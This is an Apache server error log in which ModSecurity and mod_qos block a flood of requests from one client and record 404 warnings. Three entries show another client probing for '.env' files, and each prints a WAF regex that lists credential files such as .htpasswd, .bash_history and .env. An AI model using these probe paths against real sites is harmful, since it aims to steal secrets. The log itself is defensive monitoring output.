[Tue May 26 19:54:56.651814 2026] [security2:error] [pid 86490:tid 86732] [client 185.177.72.53:56282] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/vue-app/client/.env"] [unique_id "ahWtOFZMwN0DpLVWo6LJBgAAAPU"]
[Tue May 26 19:54:56.733218 2026] [qos:error] [pid 93576:tid 93753] [client 45.148.10.120:35254] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtOGDRMqfxdEDkoszU1QAAACk
[Tue May 26 19:54:56.733988 2026] [qos:error] [pid 86490:tid 86727] [client 45.148.10.120:34958] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtOFZMwN0DpLVWo6LJCgAAAPA
[Tue May 26 19:54:56.735578 2026] [qos:error] [pid 86490:tid 86715] [client 45.148.10.120:60008] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtOFZMwN0DpLVWo6LJCwAAAOQ
[Tue May 26 19:54:56.736540 2026] [qos:error] [pid 93868:tid 94358] [client 45.148.10.120:49360] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtOEqK9k_ZUB2Vp25NVwAAAfM
[Tue May 26 19:54:56.738423 2026] [qos:error] [pid 93868:tid 94331] [client 45.148.10.120:56914] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtOEqK9k_ZUB2Vp25NWAAAAdg
[Tue May 26 19:54:56.739274 2026] [qos:error] [pid 93868:tid 94344] [client 45.148.10.120:60050] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtOEqK9k_ZUB2Vp25NWQAAAeU
[Tue May 26 19:54:56.745933 2026] [qos:error] [pid 93576:tid 93727] [client 45.148.10.120:43372] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtOGDRMqfxdEDkoszU1gAAAA8
[Tue May 26 19:54:56.750489 2026] [qos:error] [pid 93868:tid 94354] [client 45.148.10.120:60186] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtOEqK9k_ZUB2Vp25NWgAAAe8
[Tue May 26 19:54:56.751493 2026] [qos:error] [pid 93576:tid 93778] [client 45.148.10.120:43380] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtOGDRMqfxdEDkoszU1wAAAEI
[Tue May 26 19:54:56.761747 2026] [qos:error] [pid 86490:tid 86639] [client 45.148.10.120:49406] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtOFZMwN0DpLVWo6LJEAAAAJg
[Tue May 26 19:54:56.904915 2026] [qos:error] [pid 93576:tid 93760] [client 45.148.10.120:35254] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtOGDRMqfxdEDkoszU2AAAADA
[Tue May 26 19:54:56.906209 2026] [qos:error] [pid 86490:tid 86638] [client 45.148.10.120:34958] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtOFZMwN0DpLVWo6LJEgAAAJc
[Tue May 26 19:54:56.913080 2026] [qos:error] [pid 86490:tid 86659] [client 45.148.10.120:60008] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtOFZMwN0DpLVWo6LJEwAAAKw
[Tue May 26 19:54:56.913606 2026] [qos:error] [pid 93868:tid 94264] [client 45.148.10.120:49360] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtOEqK9k_ZUB2Vp25NWwAAAZU
[Tue May 26 19:54:56.914059 2026] [qos:error] [pid 86490:tid 86709] [client 45.148.10.120:49406] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtOFZMwN0DpLVWo6LJFAAAAN4
[Tue May 26 19:54:56.915218 2026] [qos:error] [pid 93576:tid 93803] [client 45.148.10.120:43372] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtOGDRMqfxdEDkoszU2QAAAFs
[Tue May 26 19:54:56.917707 2026] [qos:error] [pid 93868:tid 94294] [client 45.148.10.120:60050] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtOEqK9k_ZUB2Vp25NXAAAAbM
[Tue May 26 19:54:56.918431 2026] [qos:error] [pid 93868:tid 94294] [client 45.148.10.120:56914] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtOEqK9k_ZUB2Vp25NXQAAAbM
[Tue May 26 19:54:56.919908 2026] [qos:error] [pid 93868:tid 94346] [client 45.148.10.120:60186] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtOEqK9k_ZUB2Vp25NXgAAAec
[Tue May 26 19:54:56.921431 2026] [qos:error] [pid 93576:tid 93816] [client 45.148.10.120:43380] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtOGDRMqfxdEDkoszU2gAAAGg
[Tue May 26 19:54:57.166578 2026] [qos:error] [pid 93576:tid 93744] [client 45.148.10.120:35254] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtOWDRMqfxdEDkoszU2wAAACA
[Tue May 26 19:54:57.174788 2026] [qos:error] [pid 93576:tid 93835] [client 45.148.10.120:43372] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtOWDRMqfxdEDkoszU3AAAAHs
[Tue May 26 19:54:57.175669 2026] [qos:error] [pid 86490:tid 86714] [client 45.148.10.120:60008] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtOVZMwN0DpLVWo6LJGwAAAOM
[Tue May 26 19:54:57.176734 2026] [qos:error] [pid 93868:tid 94272] [client 45.148.10.120:49360] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtOUqK9k_ZUB2Vp25NYQAAAZ0
[Tue May 26 19:54:57.176936 2026] [qos:error] [pid 86490:tid 86732] [client 45.148.10.120:49406] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtOVZMwN0DpLVWo6LJHAAAAPU
[Tue May 26 19:54:57.180672 2026] [qos:error] [pid 93868:tid 94297] [client 45.148.10.120:60050] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtOUqK9k_ZUB2Vp25NYgAAAbY
[Tue May 26 19:54:57.182350 2026] [qos:error] [pid 93576:tid 93791] [client 45.148.10.120:43380] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtOWDRMqfxdEDkoszU3QAAAE8
[Tue May 26 19:54:57.182468 2026] [qos:error] [pid 93868:tid 94322] [client 45.148.10.120:60186] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtOUqK9k_ZUB2Vp25NYwAAAc8
[Tue May 26 19:54:57.182910 2026] [qos:error] [pid 93868:tid 94333] [client 45.148.10.120:56914] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtOUqK9k_ZUB2Vp25NZAAAAdo
[Tue May 26 19:54:57.204320 2026] [security2:error] [pid 86490:tid 86718] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWtOFZMwN0DpLVWo6LJDwAAAOc"]
[Tue May 26 19:54:57.274427 2026] [security2:error] [pid 86490:tid 86662] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtN1ZMwN0DpLVWo6LIoQAAAK8"]
[Tue May 26 19:54:57.283973 2026] [security2:error] [pid 93576:tid 93735] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtN2DRMqfxdEDkoszUsQAAABc"]
[Tue May 26 19:54:57.293543 2026] [security2:error] [pid 86490:tid 86658] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtN1ZMwN0DpLVWo6LIlgAAAKs"]
[Tue May 26 19:54:57.297439 2026] [security2:error] [pid 86490:tid 86739] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtN1ZMwN0DpLVWo6LIqwAAAPw"]
[Tue May 26 19:54:57.303975 2026] [security2:error] [pid 86490:tid 86683] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtN1ZMwN0DpLVWo6LIvwAAAMQ"]
[Tue May 26 19:54:57.307823 2026] [security2:error] [pid 86490:tid 86694] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtN1ZMwN0DpLVWo6LIpwAAAM8"]
[Tue May 26 19:54:57.312248 2026] [security2:error] [pid 86490:tid 86673] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtN1ZMwN0DpLVWo6LIlAAAALo"]
[Tue May 26 19:54:57.315572 2026] [security2:error] [pid 86490:tid 86621] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtN1ZMwN0DpLVWo6LIuAAAAIY"]
[Tue May 26 19:54:57.317514 2026] [security2:error] [pid 93576:tid 93812] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtN2DRMqfxdEDkoszUsgAAAGQ"]
[Tue May 26 19:54:57.324463 2026] [security2:error] [pid 86490:tid 86626] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtN1ZMwN0DpLVWo6LIswAAAIs"]
[Tue May 26 19:54:57.331993 2026] [security2:error] [pid 86490:tid 86625] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtN1ZMwN0DpLVWo6LItgAAAIo"]
[Tue May 26 19:54:57.332813 2026] [security2:error] [pid 93868:tid 94263] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtN0qK9k_ZUB2Vp25NIgAAAZQ"]
[Tue May 26 19:54:57.338992 2026] [security2:error] [pid 93868:tid 94381] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtN0qK9k_ZUB2Vp25NIwAAAgo"]
[Tue May 26 19:54:57.348682 2026] [security2:error] [pid 86490:tid 86724] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtN1ZMwN0DpLVWo6LItQAAAO0"]
[Tue May 26 19:54:57.374245 2026] [security2:error] [pid 86490:tid 86628] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtN1ZMwN0DpLVWo6LIxAAAAI0"]
[Tue May 26 19:54:57.374506 2026] [security2:error] [pid 86490:tid 86669] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtN1ZMwN0DpLVWo6LIvAAAALY"]
[Tue May 26 19:54:57.385090 2026] [security2:error] [pid 93576:tid 93796] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtN2DRMqfxdEDkoszUtAAAAFQ"]
[Tue May 26 19:54:57.394808 2026] [security2:error] [pid 93868:tid 94323] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtOEqK9k_ZUB2Vp25NNAAAAdA"]
[Tue May 26 19:54:57.398464 2026] [security2:error] [pid 86490:tid 86648] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtN1ZMwN0DpLVWo6LIuwAAAKE"]
[Tue May 26 19:54:57.398904 2026] [security2:error] [pid 93576:tid 93815] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtOGDRMqfxdEDkoszUugAAAGc"]
[Tue May 26 19:54:57.404590 2026] [security2:error] [pid 86490:tid 86708] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtN1ZMwN0DpLVWo6LIwAAAAN0"]
[Tue May 26 19:54:57.411094 2026] [security2:error] [pid 93868:tid 94364] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtOEqK9k_ZUB2Vp25NMgAAAfk"]
[Tue May 26 19:54:57.416066 2026] [security2:error] [pid 86490:tid 86735] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtOFZMwN0DpLVWo6LI0gAAAPg"]
[Tue May 26 19:54:57.418034 2026] [security2:error] [pid 86490:tid 86646] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtOFZMwN0DpLVWo6LI1QAAAJ8"]
[Tue May 26 19:54:57.424640 2026] [security2:error] [pid 93868:tid 94377] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtOEqK9k_ZUB2Vp25NMQAAAgY"]
[Tue May 26 19:54:57.451256 2026] [security2:error] [pid 93576:tid 93810] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtOGDRMqfxdEDkoszUvwAAAGI"]
[Tue May 26 19:54:57.455788 2026] [security2:error] [pid 93576:tid 93833] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtOGDRMqfxdEDkoszUvAAAAHk"]
[Tue May 26 19:54:57.460147 2026] [security2:error] [pid 93868:tid 94271] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtOEqK9k_ZUB2Vp25NOQAAAZw"]
[Tue May 26 19:54:57.469444 2026] [security2:error] [pid 93576:tid 93728] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtOGDRMqfxdEDkoszUwgAAABA"]
[Tue May 26 19:54:57.469995 2026] [security2:error] [pid 93868:tid 94270] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtOEqK9k_ZUB2Vp25NMAAAAZs"]
[Tue May 26 19:54:57.581133 2026] [qos:error] [pid 93576:tid 93773] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtOWDRMqfxdEDkoszU9gAAAD0
[Tue May 26 19:54:57.605819 2026] [qos:error] [pid 86490:tid 86648] [client 45.148.10.120:60128] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtOVZMwN0DpLVWo6LJXgAAAKE
[Tue May 26 19:54:57.624041 2026] [qos:error] [pid 93868:tid 94302] [client 45.148.10.120:56886] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtOUqK9k_ZUB2Vp25NgAAAAbs
[Tue May 26 19:54:57.625679 2026] [qos:error] [pid 86490:tid 86655] [client 45.148.10.120:49332] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtOVZMwN0DpLVWo6LJXwAAAKg
[Tue May 26 19:54:57.627640 2026] [security2:error] [pid 86490:tid 86657] [client 185.177.72.53:56282] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/hidden/.env"] [unique_id "ahWtOVZMwN0DpLVWo6LJYAAAAKo"]
[Tue May 26 19:54:57.628282 2026] [qos:error] [pid 86490:tid 86742] [client 45.148.10.120:49336] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtOVZMwN0DpLVWo6LJYQAAAP8
[Tue May 26 19:54:57.717544 2026] [qos:error] [pid 93868:tid 94332] [client 45.148.10.120:43364] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtOUqK9k_ZUB2Vp25NgQAAAdk
[Tue May 26 19:54:57.732359 2026] [qos:error] [pid 86490:tid 86703] [client 45.148.10.120:59990] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtOVZMwN0DpLVWo6LJYgAAANg
[Tue May 26 19:54:57.756040 2026] [qos:error] [pid 86490:tid 86711] [client 45.148.10.120:60128] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtOVZMwN0DpLVWo6LJYwAAAOA
[Tue May 26 19:54:57.756352 2026] [qos:error] [pid 93868:tid 94337] [client 45.148.10.120:43404] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtOUqK9k_ZUB2Vp25NggAAAd4
[Tue May 26 19:54:57.773267 2026] [qos:error] [pid 93868:tid 94316] [client 45.148.10.120:56886] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtOUqK9k_ZUB2Vp25NgwAAAck
[Tue May 26 19:54:57.777337 2026] [qos:error] [pid 86490:tid 86731] [client 45.148.10.120:49332] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtOVZMwN0DpLVWo6LJZAAAAPQ
[Tue May 26 19:54:57.777379 2026] [qos:error] [pid 86490:tid 86735] [client 45.148.10.120:49336] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWtOVZMwN0DpLVWo6LJZQAAAPg
[Tue May 26 19:54:57.788096 2026] [qos:error] [pid 93868:tid 94310] [client 45.148.10.120:43412] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtOUqK9k_ZUB2Vp25NhAAAAcM
[Tue May 26 19:54:57.790101 2026] [security2:error] [pid 86490:tid 86723] [client 185.177.72.53:56282] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/wp-admin/.env"] [unique_id "ahWtOVZMwN0DpLVWo6LJZgAAAOw"]
[Tue May 26 19:54:57.905923 2026] [qos:error] [pid 93576:tid 93722] [client 45.148.10.120:43422] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtOWDRMqfxdEDkoszU9wAAAAo
[Tue May 26 19:54:57.984387 2026] [qos:error] [pid 93868:tid 94354] [client 45.148.10.120:43364] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtOUqK9k_ZUB2Vp25NiAAAAe8
[Tue May 26 19:54:57.986170 2026] [qos:error] [pid 86490:tid 86683] [client 45.148.10.120:59990] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtOVZMwN0DpLVWo6LJaAAAAMQ
[Tue May 26 19:54:58.115225 2026] [qos:error] [pid 93868:tid 94303] [client 45.148.10.120:43404] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtOkqK9k_ZUB2Vp25NjgAAAbw
[Tue May 26 19:54:58.117017 2026] [qos:error] [pid 86490:tid 86719] [client 45.148.10.120:60128] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtOlZMwN0DpLVWo6LJbgAAAOg
[Tue May 26 19:54:58.121865 2026] [qos:error] [pid 86490:tid 86620] [client 45.148.10.120:49336] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtOlZMwN0DpLVWo6LJbwAAAIU
[Tue May 26 19:54:58.123004 2026] [qos:error] [pid 93868:tid 94264] [client 45.148.10.120:60112] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtOkqK9k_ZUB2Vp25NkAAAAZU
[Tue May 26 19:54:58.123036 2026] [qos:error] [pid 93868:tid 94366] [client 45.148.10.120:56886] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWtOkqK9k_ZUB2Vp25NjwAAAfs
[Tue May 26 19:54:58.125859 2026] [qos:error] [pid 86490:tid 86671] [client 45.148.10.120:49332] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtOlZMwN0DpLVWo6LJcAAAALg
[Tue May 26 19:54:58.255036 2026] [qos:error] [pid 93576:tid 93771] [client 45.148.10.120:43422] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtOmDRMqfxdEDkoszU-gAAADs
[Tue May 26 19:54:58.255937 2026] [qos:error] [pid 93868:tid 94322] [client 45.148.10.120:43364] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtOkqK9k_ZUB2Vp25NlgAAAc8
[Tue May 26 19:54:58.256250 2026] [qos:error] [pid 86490:tid 86693] [client 45.148.10.120:59990] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtOlZMwN0DpLVWo6LJcQAAAM4
[Tue May 26 19:54:58.258796 2026] [qos:error] [pid 93868:tid 94333] [client 45.148.10.120:43412] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtOkqK9k_ZUB2Vp25NlwAAAdo
